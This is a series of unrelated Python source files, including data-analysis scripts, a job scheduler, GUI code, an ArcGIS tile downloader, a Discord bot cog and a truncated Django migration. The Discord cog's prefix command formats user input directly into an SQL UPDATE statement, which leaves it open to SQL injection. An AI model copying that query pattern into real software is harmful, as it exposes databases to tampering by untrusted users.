numerical_na_col = [elt for elt in df_2.index if df_2[elt]]
numerical_not_na_col = [elt for elt in df_2.index if not df_2[elt]]
# print(numerical_na_col)
# print(numerical_not_na_col)
target_feature = numerical_not_na_col[-1]
print('target feature: ' + target_feature)
# plot data for SalePrice only (boxplot and scatter plot)
# plt.subplot(2,2,1)
# display_sell_price()
numerical_not_na_col_2 = numerical_not_na_col[:len(numerical_not_na_col)-1].copy()
indexes = [ind for ind in range(len(numerical_not_na_col_2))]
# compute correlation with salePrice with features not containing na
corr = []
for col in numerical_not_na_col_2:
corr.append(np.corrcoef(df_numerical[col], df_numerical[target_feature])[0, 1])
# sort
indexes = [x for _,x in sorted(zip(corr,indexes))]
print('n elt: ' + str(len(indexes)))
# consider 0 as missing values: EnclosedPorch, BsmtFinSF2, 3SsnPorch, PoolArea, ScreenPorch, BsmtUnfSF (few), OpenPorchSF, 22ndFlrSF, WoodDeckSF, BsmtFinSF1, YearRemodAdd, TotalBsmtSF, GarageArea
# create categorical variables when few values: KitchenAbvGr, LowQualFinSF, MiscVal, BsmtHalfBath, BsmtFullBath, HalfBath, Fireplaces, FullBath
# categorical with a lot of values: OverallCond (~), YrSold, MoSold, BedroomAbvGr, TotRmsAbvGrd, GarageCars (~)
# compute correlation with missing values
corr2 = []
indexes_2 = [ind for ind in range(len(numerical_na_col))]
for col in numerical_na_col:
# print(col)
df_temp = df_numerical[[col, target_feature]]
df_temp = df_temp.dropna()
# print(df_temp)
corr2.append(np.corrcoef(df_temp[col], df_temp[target_feature])[0, 1])
# sort
indexes_2 = [x for _,x in sorted(zip(corr2,indexes_2))]
print(corr2)
# ncol = 6
# nrow = 3
# create a grid of plots for correlations
# for ind_plot in range(1,ncol*nrow+1):
# selected_feature = numerical_not_na_col_2[indexes[-ind_plot]]
# plt.subplot(nrow,ncol,ind_plot)
# plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
# plot_col_vs_target(df_numerical, selected_feature, target_feature)
# https://matplotlib.org/3.1.3/gallery/images_contours_and_fields/image_annotated_heatmap.html
corr_matrix = compute_correlations(df_numerical)
# print(corr_matrix)
plt.rcParams.update({'font.size': 8})
fig, ax = plt.subplots()
ax.imshow(corr_matrix, interpolation='nearest')
numrows,numcols = corr_matrix.shape
# ax.format_coord = format_coord
# We want to show all ticks...
ax.set_xticks(np.arange(numrows))
ax.set_yticks(np.arange(numcols))
# ... and label them with the respective list entries
ax.set_xticklabels(df_numerical.columns)
ax.set_yticklabels(df_numerical.columns)
plt.setp(ax.get_xticklabels(), rotation=90, ha="right", rotation_mode="anchor")
plt.show()
|
from signal import SIGTERM
from os import kill, getpid
from multiprocess import Process
from simple_scheduler.base import Schedule
class Recurring(Schedule):
""" Recurring tasks are those that occur after every "x"-seconds.
(e.g. script_1 is called every 600 seconds)"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def _schedule(self, function, tz, start, stop,
period_in_seconds, number_of_reattempts,
reattempt_duration_in_seconds):
"""
Parameters
----------
function : a callable function
tz : str
standard time zone (call the method .timezones() for more info)
start : str
of the form "Month DD HH:MM:SS YYYY" (eg. "Dec 31 23:59:59 2021")
stop : str
of the form "Month DD HH:MM:SS YYYY" (eg. "Dec 31 23:59:59 2021")
period_in_seconds : int
the time period in seconds
number_of_reattempts : int
each event is tried these many number of times, but executed once
reattempt_duration_in_seconds : int
duration to wait (in seconds) after un-successful attempt
Returns
-------
None.
"""
while True:
try:
continue_ = self._execute(
tz=tz,
start=start,
stop=stop,
function=function,
period_in_seconds=period_in_seconds,
number_of_reattempts=number_of_reattempts,
reattempt_duration_in_seconds=reattempt_duration_in_seconds
)
if continue_:
continue
else:
break
except Exception as e:
self._print(str(e))
[p.terminate for p in self._workers]
self._workers = []
pass
def add_job(self,
target,
period_in_seconds,
tz="GMT",
start=None,
stop=None,
job_name=None,
number_of_reattempts=0,
reattempt_duration_in_seconds=0,
args=(),
kwargs={}):
"""
Assigns an periodic task to a process.
Parameters
----------
target : a callable function
period_in_seconds : int
the time period in seconds to execute this function
tz : str, optional
standard time zone (call the method .timezones() for more info)
the default is "GMT"
start : str, optional
of the form "Month DD HH:MM:SS YYYY" (eg. "Dec 31 23:59:59 2021")
the default is None
stop : str, optional
of the form "Month DD HH:MM:SS YYYY" (eg. "Dec 31 23:59:59 2021")
the default is None
job_name : str, optional
used to identify a job, defaults to name of the function
to remove jobs use this name
args : tuple(object,), optional
un-named argumets for the "target" callable
the default is ()
kwargs : dict{key:object}, optional
named argumets for the "target" callable
the default is {}
number_of_reattempts : int, optional
default is 0
each recurring is tried these many number of times, but executed once
reattempt_duration_in_seconds : int, optional
default is 0 secs
duration to wait (in seconds) after un-successful attempt
Returns
-------
None.
"""
try:
assert(type(reattempt_duration_in_seconds) == int)
except ValueError:
try:
assert(type(reattempt_duration_in_seconds) == float)
except ValueError:
raise Exception("reattempt_duration_in_seconds(seconds) should be"+\
" either int or float")
try:
assert(reattempt_duration_in_seconds*number_of_reattempts < period_in_seconds)
except:
print("(reattempt_duration_in_seconds * number_of_reattempts) must be less"+\
" than (period_in_seconds)")
try:
self._validate_start_stop(start, stop)
except:
raise
function, job_name = self._manifest_function(target,
job_name,
args,
kwargs)
self._jobs[job_name] = [f"{job_name} "+\
f"[recurring | {period_in_seconds}-second(s)]"]
p = Process(target=self._schedule,
name = job_name,
args=(function, tz, start, stop, period_in_seconds,
number_of_reattempts, reattempt_duration_in_seconds))
self._processes.append(p)
recurring_scheduler = Recurring(verbose=True)
|
import numpy as np
import random
import csv
import matplotlib.pyplot as plt
#파일로 데이터 입력(Column Name없이), 파일명 : ex_kmc.csv
def loadDataset(filename, split, trainingSet=[] , testSet=[]):
with open(filename, 'r') as csvfile:
lines = csv.reader(csvfile)
dataset = list(lines)
for x in range(len(dataset)):
for y in range(2):
dataset[x][y] = float(dataset[x][y])
if random.random() < split:
trainingSet.append(dataset[x])
else:
testSet.append(dataset[x])
def kmeans(X,k,maxIt):
numPoints,numDim=X.shape
dataSet=np.zeros((numPoints,numDim+1))
dataSet[:,:-1]=X
centroids=dataSet[np.random.randint(numPoints,size=k),:]
centroids[:,-1]=range(1,k+1)
#print("centroids:",centroids)
iterations=0;
oldCentroids=None
while not shouldStop(oldCentroids, centroids, iterations, maxIt):
oldCentroids=np.copy(centroids)
iterations+=1
updateLabels(dataSet, centroids)
centroids=getCentroids(dataSet, k)
return dataSet, centroids
def shouldStop(oldCentroids,centroids,iterations,maxIt):
if iterations>maxIt:
return True
return np.array_equal(oldCentroids, centroids)
def updateLabels(dataSet,centroids):
numPoints,numDim=dataSet.shape
for i in range(numPoints):
dataSet[i,-1]=getLabelFromClosestCentroid(dataSet[i,:-1], centroids)
def getLabelFromClosestCentroid(dataSetRow,centroids):
label=centroids[0,-1]
minDist=np.linalg.norm(dataSetRow-centroids[0,:-1])
for i in range(1,centroids.shape[0]):
dist=np.linalg.norm(dataSetRow-centroids[i,:-1])
if dist<minDist:
minDist=dist
label=centroids[i,-1]
#print("label:"+str(label))
return label
def getCentroids(dataSet,k):
result=np.zeros((k,dataSet.shape[1]))
#print("result:",result)
for i in range(1,k+1):
oneCluster=dataSet[dataSet[:,-1]==i,:-1]
#print("cluster:",oneCluster)
result[i-1,:-1]=np.mean(oneCluster,axis=0)
result[i-1,-1]=i
#print("result:",result)
return result
def getNoveltyScore(dataSetRow,centroids,k):
minDist=[]
for i in range(k):
Dist=np.linalg.norm(dataSetRow[:,:-1]-centroids[i,:-1],axis=1)
minDist.append(Dist)
NoveltyScore=np.min(minDist,axis=0)
print(minDist)
#print(NoveltyScore)
return NoveltyScore
def main():
# prepare data
trainingSet=[]
testSet=[]
split = 1
random.seed(100)
loadDataset('C:/Users/myunghoon/.spyder-py3/ex_kmc2.csv', split, trainingSet, testSet)
trainX=np.array(trainingSet)
#print('Train set: ' ,repr(len(trainingSet)))
#print('Test set: ' + repr(len(testSet)))
#print('Train set: ' ,trainingSet[0:10])
#a=trainX[:,:-1].astype(np.float)
#plt.scatter(a[:,0], a[:,1]);
# k=군집개수, max_iter=반복 회수 제한(Hyper parameter)
k=2
max_iter=100
final_result=kmeans(trainX[:,:-1],k,max_iter)
kmeans_result=final_result[0]
centroid_result=final_result[1]
Score=getNoveltyScore(kmeans_result,centroid_result,k)
print('final cluster:',kmeans_result)
print('final centroid:',centroid_result)
print('Novelty Score:',Score)
x=kmeans_result[:,0]
y=kmeans_result[:,1]
colors=kmeans_result[:,2]
plt.figure(figsize=(7, 3), dpi=80)
plt.scatter(x, y, s=(Score**3)*3, c=colors);
plt.xticks(np.arange(-1,8,2))
plt.yticks(np.arange(-1.5,1.6,0.5))
main()
|
from PyQt5 import QtCore, QtGui, QtWidgets
from lib.Themes import app_dark_mode
from matplotlib.figure import Figure
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as Toolbar
from matplotlib.widgets import RectangleSelector
from lib.ID_Tab import create_tabID
def create_tabConfig(self):
# Set up configuration tab
self.tabWidget.addTab(self.tabID, "")
self.tabConfig = QtWidgets.QWidget()
self.tabConfig.setObjectName("tabConfig")
self.X1 = 0
self.X2 = 0
self.Y1 = 0
self.Y2 = 0
# ----- Channel Frame -----#
# Set up RGB frame, which contains channel isolation & switching functionality.
self.frameRGB = QtWidgets.QFrame(self.tabConfig)
self.frameRGB.setGeometry(QtCore.QRect(10, 20, 381, 71))
self.frameRGB.setFrameShape(QtWidgets.QFrame.Panel)
self.frameRGB.setFrameShadow(QtWidgets.QFrame.Sunken)
self.frameRGB.setLineWidth(2)
self.frameRGB.setObjectName("frameRGB")
# RGB frame label
self.labelRGB = QtWidgets.QLabel(self.frameRGB)
self.labelRGB.setGeometry(QtCore.QRect(10, 10, 221, 20))
font = QtGui.QFont()
font.setPointSize(13)
font.setBold(True)
font.setWeight(75)
self.labelRGB.setFont(font)
self.labelRGB.setObjectName("labelRGB")
# RGB radiobuttons (Red/Green/Blue/All)
self.rbRed = QtWidgets.QRadioButton(self.frameRGB)
self.rbRed.setGeometry(QtCore.QRect(20, 40, 51, 25))
font = QtGui.QFont()
font.setPointSize(12)
self.rbRed.setFont(font)
self.rbRed.setObjectName("rbRed")
self.rbGreen = QtWidgets.QRadioButton(self.frameRGB)
self.rbGreen.setGeometry(QtCore.QRect(100, 40, 71, 25))
font = QtGui.QFont()
font.setPointSize(12)
self.rbGreen.setFont(font)
self.rbGreen.setObjectName("rbGreen")
self.rbBlue = QtWidgets.QRadioButton(self.frameRGB)
self.rbBlue.setGeometry(QtCore.QRect(200, 40, 61, 25))
font = QtGui.QFont()
font.setPointSize(12)
self.rbBlue.setFont(font)
self.rbBlue.setObjectName("rbBlue")
self.rbAll = QtWidgets.QRadioButton(self.frameRGB)
self.rbAll.setGeometry(QtCore.QRect(290, 40, 61, 25))
font = QtGui.QFont()
font.setPointSize(12)
self.rbAll.setFont(font)
self.rbAll.setObjectName("rbAll")
# ----- Cropping Frame ----- #
# Set up crop frame which contains crop information. Functionality for crop is in the graphics widget.
self.frameCrop = QtWidgets.QFrame(self.tabConfig)
self.frameCrop.setGeometry(QtCore.QRect(10, 100, 381, 131))
self.frameCrop.setFrameShape(QtWidgets.QFrame.Panel)
self.frameCrop.setFrameShadow(QtWidgets.QFrame.Sunken)
self.frameCrop.setLineWidth(2)
self.frameCrop.setObjectName("frameCrop")
# Label which titles the crop frame
self.labelCropTitle = QtWidgets.QLabel(self.frameCrop)
self.labelCropTitle.setGeometry(QtCore.QRect(10, 10, 81, 20))
font = QtGui.QFont()
font.setPointSize(13)
font.setBold(True)
font.setWeight(75)
self.labelCropTitle.setFont(font)
self.labelCropTitle.setObjectName("labelCropTitle")
# Label giving instruction on how to set a crop region
self.labelCrop = QtWidgets.QLabel(self.frameCrop)
self.labelCrop.setGeometry(QtCore.QRect(40, 40, 291, 31))
font = QtGui.QFont()
font.setPointSize(12)
self.labelCrop.setFont(font)
self.labelCrop.setObjectName("labelCrop")
# Label giving crop co-ordinate information. This is saved as a variable.
self.labelCoords = QtWidgets.QLabel(self.frameCrop)
self.labelCoords.setGeometry(QtCore.QRect(40, 70, 291, 31))
font = QtGui.QFont()
font.setPointSize(12)
self.labelCoords.setFont(font)
self.labelCoords.setObjectName("labelCoords")
# Set up graphics widget
self.graphicConfig = QtWidgets.QGraphicsView(self.tabConfig)
self.graphicConfig.setGeometry(QtCore.QRect(0, 290, 801, 441))
self.graphicConfig.setObjectName("graphicConfig")
# ----- Downsampling Frame ----- #
# Set up downsampling frame, which contains downsampling functionality
self.frameDownsample = QtWidgets.QFrame(self.tabConfig)
self.frameDownsample.setGeometry(QtCore.QRect(400, 100, 381, 131))
self.frameDownsample.setFrameShape(QtWidgets.QFrame.Panel)
self.frameDownsample.setFrameShadow(QtWidgets.QFrame.Sunken)
self.frameDownsample.setLineWidth(2)
self.frameDownsample.setObjectName("frameDownsample")
# Label for DS frame title.
self.labelDS = QtWidgets.QLabel(self.frameDownsample)
self.labelDS.setGeometry(QtCore.QRect(10, -1, 141, 31))
font = QtGui.QFont()
font.setPointSize(13)
font.setBold(True)
font.setWeight(75)
self.labelDS.setFont(font)
self.labelDS.setObjectName("labelDS")
# Labels and Entries for downsampling functionality.
self.entryY1 = QtWidgets.QLineEdit(self.frameDownsample)
self.entryY1.setGeometry(QtCore.QRect(70, 90, 113, 32))
self.entryY1.setObjectName("entryY1")
self.entryX1 = QtWidgets.QLineEdit(self.frameDownsample)
self.entryX1.setGeometry(QtCore.QRect(70, 50, 113, 32))
self.entryX1.setObjectName("entryX1")
self.entryX2 = QtWidgets.QLineEdit(self.frameDownsample)
self.entryX2.setGeometry(QtCore.QRect(250, 50, 113, 32))
self.entryX2.setObjectName("entryX2")
self.entryY2 = QtWidgets.QLineEdit(self.frameDownsample)
self.entryY2.setGeometry(QtCore.QRect(250, 90, 113, 32))
self.entryY2.setObjectName("entryY2")
self.labelDSImage = QtWidgets.QLabel(self.frameDownsample)
self.labelDSImage.setGeometry(QtCore.QRect(90, 30, 91, 20))
self.labelDSImage.setObjectName("labelDSImage")
self.labelDSNew = QtWidgets.QLabel(self.frameDownsample)
self.labelDSNew.setGeometry(QtCore.QRect(250, 30, 111, 20))
self.labelDSNew.setObjectName("labelDSNew")
self.labelDSX1 = QtWidgets.QLabel(self.frameDownsample)
self.labelDSX1.setGeometry(QtCore.QRect(10, 50, 62, 31))
self.labelDSX1.setObjectName("labelDSX1")
self.labelDSX2 = QtWidgets.QLabel(self.frameDownsample)
self.labelDSX2.setGeometry(QtCore.QRect(190, 50, 62, 31))
self.labelDSX2.setObjectName("labelDSX2")
self.labelDSY2 = QtWidgets.QLabel(self.frameDownsample)
self.labelDSY2.setGeometry(QtCore.QRect(190, 90, 62, 31))
self.labelDSY2.setObjectName("labelDSY2")
self.labelDSY1 = QtWidgets.QLabel(self.frameDownsample)
self.labelDSY1.setGeometry(QtCore.QRect(10, 90, 62, 31))
self.labelDSY1.setObjectName("labelDSY1")
# ----- Rotation Frame ----- #
# Set up rotation frame which contains rotation functionality.
self.frameRotate = QtWidgets.QFrame(self.tabConfig)
self.frameRotate.setGeometry(QtCore.QRect(400, 20, 381, 71))
self.frameRotate.setFrameShape(QtWidgets.QFrame.Panel)
self.frameRotate.setFrameShadow(QtWidgets.QFrame.Sunken)
self.frameRotate.setLineWidth(2)
self.frameRotate.setObjectName("frameRotate")
# Label which titles rotational frame
self.labelRotate = QtWidgets.QLabel(self.frameRotate)
self.labelRotate.setGeometry(QtCore.QRect(10, 10, 151, 20))
font = QtGui.QFont()
font.setPointSize(13)
font.setBold(True)
font.setWeight(75)
self.labelRotate.setFont(font)
self.labelRotate.setObjectName("labelRotate")
# Spinbox for selecting degrees of rotation
self.spinDegrees = QtWidgets.QSpinBox(self.frameRotate)
self.spinDegrees.setGeometry(QtCore.QRect(160, 30, 71, 31))
self.spinDegrees.setObjectName("spinDegrees")
self.spinDegrees.setMinimum(-360)
self.spinDegrees.setMaximum(360)
# Label for degree selection
self.labelDegrees = QtWidgets.QLabel(self.frameRotate)
self.labelDegrees.setGeometry(QtCore.QRect(10, 29, 161, 31))
font = QtGui.QFont()
font.setPointSize(12)
self.labelDegrees.setFont(font)
self.labelDegrees.setObjectName("labelDegrees")
# Rotation Button
self.buttonRotate = QtWidgets.QPushButton(self.frameRotate)
self.buttonRotate.setGeometry(QtCore.QRect(250, 30, 111, 31))
self.buttonRotate.setObjectName("ButtonRotate")
# ----- Buttons ----- #
# Help Button -> Produces pop-up window with tab information
self.buttonHelp2 = QtWidgets.QPushButton(self.tabConfig)
self.buttonHelp2.setGeometry(QtCore.QRect(440, 240, 71, 41))
self.buttonHelp2.setObjectName("buttonHelp2")
# Reset Button -> Resets image to original state
self.buttonReset = QtWidgets.QPushButton(self.tabConfig)
self.buttonReset.setGeometry(QtCore.QRect(520, 240, 71, 41))
self.buttonReset.setObjectName("buttonReset")
# Apply Button -> Applys all channel, rotation, crop and downsampling settings to original image.
self.buttonApply = QtWidgets.QPushButton(self.tabConfig)
self.buttonApply.setGeometry(QtCore.QRect(600, 240, 71, 41))
self.buttonApply.setObjectName("buttonApply")
# Continue Button -> Save all settings and proceed to variogram analysis tab
self.buttonContinue2 = QtWidgets.QPushButton(self.tabConfig)
self.buttonContinue2.setGeometry(QtCore.QRect(680, 240, 101, 41))
self.buttonContinue2.setObjectName("buttonContinue2")
# ----- Image Stack Frame ----- #
# Sets up the stack frame, which includes stack-based processing functionality.
self.frameStack = QtWidgets.QFrame(self.tabConfig)
self.frameStack.setGeometry(QtCore.QRect(10, 240, 421, 41))
self.frameStack.setFrameShape(QtWidgets.QFrame.Panel)
self.frameStack.setFrameShadow(QtWidgets.QFrame.Sunken)
self.frameStack.setLineWidth(2)
self.frameStack.setObjectName("frameStack")
# Label for stack frame
self.labelStack = QtWidgets.QLabel(self.frameStack)
self.labelStack.setGeometry(QtCore.QRect(10, 0, 201, 41))
font = QtGui.QFont()
font.setPointSize(13)
self.labelStack.setFont(font)
self.labelStack.setObjectName("labelStack")
# Slider to choose which image to display from a stack
self.sliderStack = QtWidgets.QSlider(self.frameStack)
self.sliderStack.setGeometry(QtCore.QRect(220, 0, 191, 41))
self.sliderStack.setMaximum(10)
self.sliderStack.setOrientation(QtCore.Qt.Horizontal)
self.sliderStack.setObjectName("sliderStack")
|
from __future__ import annotations #<-- Makes sure the fromlist method can return a dsDirectory object. Redundant in Python 4
import os, datetime, json
from dsFile import dsFile
class dsDirectory:
def __init__(self, path = "", new_base_path = ""):
self.path = path
self.files = []
self.subdirs = []
self.basepath = path
self.last_updated = '1900-01-01'
if new_base_path != "":
self.basepath = new_base_path
def print(self, indent: str = ""):
for fi in self.files:
print("%s%s (%s) (%s)" % (indent, fi.path, fi.get_relative_path(), fi.basepath))
for di in self.subdirs:
new_indent = indent + "----"
print("%s [%s]" % (new_indent, di.path))
di.print(new_indent)
def get_relative_path(self) -> str:
return self.path.replace(self.basepath, '')
def update(self):
self.files = []
self.subdirs = []
files=os.listdir(self.path)
files.sort()
for f in files:
c_path = self.path+'\\'+f
if os.path.isfile(c_path) == True:
newfile = dsFile(c_path, self.basepath)
newfile.basepath = self.basepath
self.files.append(newfile)
else:
newsubdir = dsDirectory(c_path, self.basepath)
newsubdir.update()
self.subdirs.append(newsubdir)
self.last_updated = datetime.date.today()
def to_dictionary(self) -> dict:
container = {}
container['path'] = self.path
container['basepath'] = self.basepath
container['last_updated'] = self.last_updated
filelist = []
subdirlist = []
for f in self.files:
filelist.append(f.to_list)
for d in self.subdirs:
subdirlist.append(d.serialize())
container['files'] = filelist
container['subdirs'] = subdirlist
return container
@staticmethod
def from_dictionary(data: dict) -> dsDirectory:
return_object = dsDirectory(data['path'], data['basepath'])
return_object.last_updated = data['last_updated']
for f in data["files"]:
return_object.files.append(dsFile.from_list(f))
for d in data['subdirs']:
return_object.subdirs.append(dsDirectory.from_dictionary(d))
return return_object
def serialize(self) -> str:
return_dict = self.to_dictionary()
return json.dumps(return_dict) |
import pytest
from year_2020.day25.combo_breaker import (
get_encryption_key,
get_loop_size,
)
def test_get_encryption_key():
assert get_encryption_key(5764801, 17807724) == 14897079
@pytest.mark.parametrize("public_key, expected", [(17807724, 11), (5764801, 8)])
def test_get_loop_size(public_key, expected):
assert get_loop_size(public_key) == expected
|
import inspect
class _ObjInfoOrigin:
""" Only one of these methods starting with 'from_' will return True. """
def _last_cls_with_name(self):
""" Get the last (bottom-most) of parent's cls that has this name in it.
:param generallibrary.ObjInfo self: """
last_cls = None
parent = self.get_parent()
if parent:
classes = [type] if parent.cls.mro is type.mro else parent.cls.mro()
for cls in classes:
if not hasattr(cls, self.name):
break
last_cls = cls
return last_cls
def from_builtin(self):
""" Get whether this attribute came from a builtin.
:param generallibrary.ObjInfo self: """
names = "fget", "fset", "fdel", "denominator", "imag", "numerator", "real", "cache_parameters"
return inspect.isbuiltin(self.obj) or getattr(self._last_cls_with_name(), "__module__", None) == "builtins" or self.name in names
def from_base(self):
""" Get whether this attribute came from one of it's cls' non-builtin bases.
Returns first base or False.
:param generallibrary.ObjInfo self: """
last_cls = self._last_cls_with_name()
return last_cls and last_cls is not getattr(self.get_parent(), "cls", None) and getattr(last_cls, "__module__", None) != "builtins"
def from_class(self):
""" Get whether this attribute came directly from it's class.
Doesn't matter if direct parent has overridden inherited attr.
Sees if bottom-most occurrence is direct parent.
# Subset of from_class_with_overrides.
:param generallibrary.ObjInfo self: """
return self._last_cls_with_name() is getattr(self.get_parent(), "cls", None)
# def from_class_with_overrides(self): # This would violate only one from_* being True rule
# """ Get whether this attribute is defined by it's direct parent, even if a base class has it.
#
# :param generallibrary.ObjInfo self: """
# return self._last_cls_with_name() is getattr(self.get_parent(), "cls", None)
def from_instance(self):
""" Get whether this attribute came from the instance.
:param generallibrary.ObjInfo self: """
parent = self.get_parent()
return bool(parent and parent.is_instance() and not self._last_cls_with_name())
def from_module(self):
""" Get whether this attribute's parent is a module.
:param generallibrary.ObjInfo self: """
parent = self.get_parent()
return bool(parent and parent.is_module())
|
import os
import glob
import tqdm
import time
import json
import arcgis
import requests
import exceptions
class Downloader:
def __init__(self, token, mapserver_url):
self.token = token
self.headers = {"Authorization": f"Bearer {self.token}"}
self.mapserver_url = mapserver_url
def download(self, shapefile, levels):
featureset = self._shapefile_to_featureset(shapefile)
result = self._estimate_export_tiles_size(featureset, levels)
print(f"Total tiles to export: {result['totalTilesToExport']}")
print(f"Estimated download size: {result['totalSize']/1000}KB")
url = self._export_tiles(featureset, levels)
folder_name = shapefile.split("/")[1].split(".")[0]
item_folder_path = f"tiles/{folder_name}"
tpk_folder_path = f"tiles/{folder_name}/tpk"
os.mkdir(item_folder_path)
os.mkdir(tpk_folder_path)
self._download_tpk(url, f"{tpk_folder_path}/layer.tpk")
return f"{tpk_folder_path}/layer.tpk"
def _result_handler(self, response):
try:
job = response.json()['jobId']
results = self._get_job_results(job)
return results['value']
except KeyError:
self._exception_handler(response)
def _exception_handler(self, response):
error = response.json()['error']
if error["code"] == 498:
raise exceptions.InvalidTokenException
def _estimate_export_tiles_size(self, featureset, levels):
data = {"f": "json",
"storageFormatType": "Compact",
"tilePackage": "true",
"exportExtent": "DEFAULT",
"exportBy": "levelId",
"levels": levels,
"areaOfInterest": featureset.to_json}
response = requests.post(
f"{self.mapserver_url}/estimateExportTilesSize", data=data, headers=self.headers)
return self._result_handler(response)
def _export_tiles(self, featureset, levels):
data = {"f": "json",
"storageFormatType": "Compact",
"tilePackage": "true",
"exportExtent": "DEFAULT",
"optimizeTilesForSize": "false",
"compressionQuality": "",
"exportBy": "levelId",
"levels": levels,
"areaOfInterest": featureset.to_json}
response = requests.post(
f"{self.mapserver_url}/exportTiles", data=data, headers=self.headers)
return self._result_handler(response)
def _get_job_status(self, job):
parameters = {"f": "json"}
response = requests.get(
f"{self.mapserver_url}/jobs/{job}", params=parameters, headers=self.headers)
status = response.json()
return status
def _get_job_results(self, job):
status = self._get_job_status(job)
while(status['jobStatus'] in ["esriJobSubmitted", "esriJobExecuting", "esriJobWaiting"]):
status = self._get_job_status(job)
time.sleep(1)
if(status['jobStatus'] == "esriJobSucceeded"):
parameters = {"f": "json"}
response = requests.get(
f"{self.mapserver_url}/jobs/{job}/results/out_service_url", params=parameters, headers=self.headers)
return response.json()
else:
raise exceptions.JobFailedException(status)
def _download_tpk(self, url, filename, attempt=1):
parameters = {"f": "json"}
response = requests.get(url, params=parameters, headers=self.headers)
for item in response.json()['files']:
file_size = int(requests.head(
item['url']).headers["Content-Length"])
bar = tqdm.tqdm(total=file_size, unit='B',
unit_scale=True, desc=filename)
with open(filename, "wb") as tpk:
response = requests.get(
item['url'], headers=self.headers, stream=True)
for chunk in response.iter_content(chunk_size=4096):
if chunk:
tpk.write(chunk)
bar.update(4096)
bar.close()
if file_size == os.path.getsize(filename):
print("File downloaded successfully!")
else:
if attempt > 2:
raise exceptions.DownloadFailedException(
f"Couldn't download {filename}")
else:
print("Download failed unexpectedly, trying again...")
self._download_tpk(url, filename, attempt=attempt + 1)
def _shapefile_to_featureset(self, shapefile):
return arcgis.features.GeoAccessor.from_featureclass(shapefile).spatial.to_featureset()
|
from .sift import *
|
import tkinter as tk
from PIL import Image, ImageTk
from math import sin, cos, radians
from timeit import default_timer as timer
def circle_cords(tetha):
print(tetha)
r = tetha // 10
return int(cos(radians(tetha%360))*r), int(sin(radians(tetha%360))*r)
class StatusBar(tk.Frame):
def __init__(self, master):
tk.Frame.__init__(self, master)
self.label = tk.Label(self, bd=1, relief=tk.SUNKEN, anchor=tk.W)
self.label.pack(fill=tk.X)
def set(self, text):
self.label.config(text=text)
self.label.update_idletasks()
def clear(self):
self.label.config(text="")
self.label.update_idletasks()
class Display(tk.Frame):
def __init__(self, parent, width=400, height=400, image: Image=None):
tk.Frame.__init__(self, parent)
self.parent = parent
self._delta_time = timer()
self.default_width = width
self.default_height = height
self._canvas = tk.Canvas(self.parent, width=width, height=height)
self._canvas.pack()
if image is None:
self.image = Image.new(mode='RGBA', size=(width + 1, height + 1), color=(0, 0, 0, 255))
else:
self.image = image
self._tk_image = ImageTk.PhotoImage(self.image)
self._c_image = self._canvas.create_image(0, 0, anchor=tk.NW, image=self._tk_image)
self.status_bar = StatusBar(self.parent)
self.status_bar.pack(side=tk.BOTTOM, fill=tk.X)
# update handler
# self.update_handler = None
self.tetha = 0
self.update_clock()
def update_display(self, delta_time):
# self.update_handler
# r = self.tetha
# g = 0
# b = 0
# if self.tetha > 255:
# r = 255
# g = self.tetha - 255
# if self.tetha > 510:
# r = 255
# g = 255
# b = self.tetha - 510
# if b == 255:
# self.tetha = 0
#
# color = (r, g, b)
x, y = circle_cords(self.tetha)
x += self.default_width // 2
y += self.default_height // 2
# aux = self.image.copy()
aux = self.image
aux.putpixel((x, y), (255, 255, 255, 255))
self._tk_image = ImageTk.PhotoImage(aux.copy())
self._canvas.itemconfigure(self._c_image, image=self._tk_image)
self.status_bar.set("FPS: {:.5}".format(1 / delta_time))
if self.tetha < 2514:
self.tetha += 1
else:
self.image.save('images/im.png', 'PNG')
self.tetha = 0
def update_clock(self):
delta_time = timer() - self._delta_time
self.update_display(delta_time)
self._delta_time = timer()
self.parent.after(20, self.update_clock)
if __name__ == "__main__":
w = 400
h = 400
# im.png = Image.new(mode='RGBA', size=(w + 1, h + 1), color=(255, 0, 0, 255))
im = Image.open("images/im1_2018-07-11_11:43:01.png")
w, h = im.size
root = tk.Tk()
Display(root, width=w, height=h, image=im).pack()
root.mainloop()
|
import os
from pathlib import Path
from sys import argv
# Directory to File extensions
dir_to_extns = {
"Audios": ["wav", "mp3", "wma", "aac"],
"Images": ["jpg", "jpeg", "bmp", "png", "gif", "tiff"],
"Videos": ["mp4", "mpeg4", "mkv", "avi", "wmv", "flv"],
"Documents": ["pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "odt", "ods", "txt", "csv", "tsv"],
"Codes": ["py", "c", "cpp", "js"],
"Applications": ["exe", "msi", "deb", "rpm"]
}
if len(argv) != 2:
if os.name == "nt":
print("[ERROR] Usage: python organize.py C:\path\to\directory")
else:
print("[ERROR] Usage: python organize.py /path/to/directory")
exit(1)
# Source directory which needs to be organized
src = Path(argv[1])
if not src.exists():
print(f"[ERROR]: '{src}' does NOT exist!")
exit(1)
if not src.is_dir():
print(f"[ERROR]: '{src}' is NOT a directory!")
exit(1)
# Files in source directory
files = [item for item in src.iterdir() if item.is_file()]
# Create Directory to Files dictionary
dir_to_files = {}
for directory, extensions in dir_to_extns.items():
dir_to_files[directory] = [file for file in files if file.suffix[1:].lower() in extensions]
# Organize source directory
for directory, files in dir_to_files.items():
dst = src / directory # destination
for file in files:
if not dst.is_dir():
dst.mkdir()
file.rename(dst / file.name)
|
import discord
from discord.ext import commands
import random
class Admin(commands.Cog):
def __init__(self, client):
self.client = client
@commands.command()
async def prefix(self, ctx, *, arg):
if ctx.author.id == ctx.guild.owner.id or ctx.author.id == 153699972443799552:
member = ctx.author
await self.client.pool.execute('UPDATE guilds SET prefix = $$%s$$ WHERE guild_id = %s' % (str(arg), ctx.guild.id))
await ctx.send(f'{ctx.guild.name} prefix changed to {arg}')
print('Prefix changed')
else:
await ctx.send(f'Only the server owner, {ctx.guild.owner.name}, can change the prefix.')
def setup(client):
client.add_cog(Admin(client))
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-05-18 03:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mooringlicensing', '0115_merge_20210517_0953'),
]
operations = [
migrations.AlterField(
model_name='approval',
name='expiry_date',
field=models.DateField(blank=True, null=True),
),
migrations.AlterField(
model_name='approval',
name='start_date',
